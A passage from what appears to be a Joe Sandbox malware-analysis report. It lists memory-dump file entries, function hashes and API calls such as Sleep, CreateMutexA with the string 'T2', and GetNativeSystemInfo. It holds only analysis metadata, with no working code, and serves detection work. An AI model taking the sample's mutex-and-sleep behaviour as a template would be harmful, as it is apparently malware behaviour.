Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e70000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2
API String ID: 1464230837-631260391
Opcode ID: cd1addb9a29f24e901e44e947b232343f69d7be8dfb48d8533fa8f1a8d736974
Instruction ID: c266060ccbaa8f0181a77ba4f74fefdec7b051df2b1f5acf11f91afed1740e14
Opcode Fuzzy Hash: cd1addb9a29f24e901e44e947b232343f69d7be8dfb48d8533fa8f1a8d736974
Instruction Fuzzy Hash: 4F3137717041008BEB08EB78ED89B6DB762DBC5320F28D62DE01CBB2D1D73589848752

Function 00E79ADC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00E7A963
CreateMutexA.KERNEL32(00000000,00000000,00ED3254), ref: 00E7A981

Strings

T2, xrefs: 00E7A970

Memory Dump Source

Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e70000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2
API String ID: 1464230837-631260391
Opcode ID: afaabf874fc6ac41699669b296860f0efa8ff01268d29f25801a9a7034aa3787
Instruction ID: 7a9fb1d40b3b941f328824c217c279d28d8b5454068488d1cc3a34bfcb99700b
Opcode Fuzzy Hash: afaabf874fc6ac41699669b296860f0efa8ff01268d29f25801a9a7034aa3787
Instruction Fuzzy Hash: 052145317042009BEB18AB68FCC9B6CB762EBC1310F24972DE40CA72E1D7759984CB16

Function 00E7A856 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00E7A963
CreateMutexA.KERNEL32(00000000,00000000,00ED3254), ref: 00E7A981

Strings

T2, xrefs: 00E7A970

Memory Dump Source

Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e70000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2
API String ID: 1464230837-631260391
Opcode ID: 0e83b0ca0d8b18081196056d1a8cf7fa88b9d0025453c9120156ce8f9de7e1db
Instruction ID: 79b1f9db831a745773f761b9f38ca9dadafaf8aa8c44f2224c557812311af7f2
Opcode Fuzzy Hash: 0e83b0ca0d8b18081196056d1a8cf7fa88b9d0025453c9120156ce8f9de7e1db
Instruction Fuzzy Hash: 90214D70349201CAFB28A778ED8E73DB351DFC1304F2CA93AE54CB62D1CA7644818253

Function 00E7A34F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00E7A963
CreateMutexA.KERNEL32(00000000,00000000,00ED3254), ref: 00E7A981

Strings

T2, xrefs: 00E7A970

Memory Dump Source

Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e70000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2
API String ID: 1464230837-631260391
Opcode ID: 6e36d2af941bd54d908fc1123bf85a6a447b020a469b0764bf1fe2fe306caf40
Instruction ID: 8d3921834c3d452976191b04d238e5fc8a184d94f8a45f8f80cf3fdad23d5823
Opcode Fuzzy Hash: 6e36d2af941bd54d908fc1123bf85a6a447b020a469b0764bf1fe2fe306caf40
Instruction Fuzzy Hash: CF214271704200ABEB18AF28EC8976CB762EBC1321F28962DE40CB76D0D77699848752

Function 00E77D30 Relevance: 1.9, APIs: 1, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E77ED3

Memory Dump Source

Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e70000_file.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 7cf3349f42cc770c64f8b746985c6ce4ac68bd221ad60cdc4222aa1bfae6d0e7
Instruction ID: 8dd68c5ae714f8593f5a062ee9c51d383e5d5397805ea314c0eb922371388cf9
Opcode Fuzzy Hash: 7cf3349f42cc770c64f8b746985c6ce4ac68bd221ad60cdc4222aa1bfae6d0e7
Instruction Fuzzy Hash: 81E12771E002449BDB19BB28DD4B39D7BA1EB45720FA4A28DE41D7B3C2DB744E8587C2

Function 00EAD82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00EAA813,00000001,00000364,00000006,000000FF,?,00EAEE3F,?,00000004,00000000,?,?), ref: 00EAD871

Memory Dump Source

Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

